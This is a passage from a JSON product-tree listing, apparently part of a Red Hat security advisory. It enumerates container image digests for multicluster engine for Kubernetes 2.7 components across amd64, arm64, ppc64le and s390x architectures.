"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
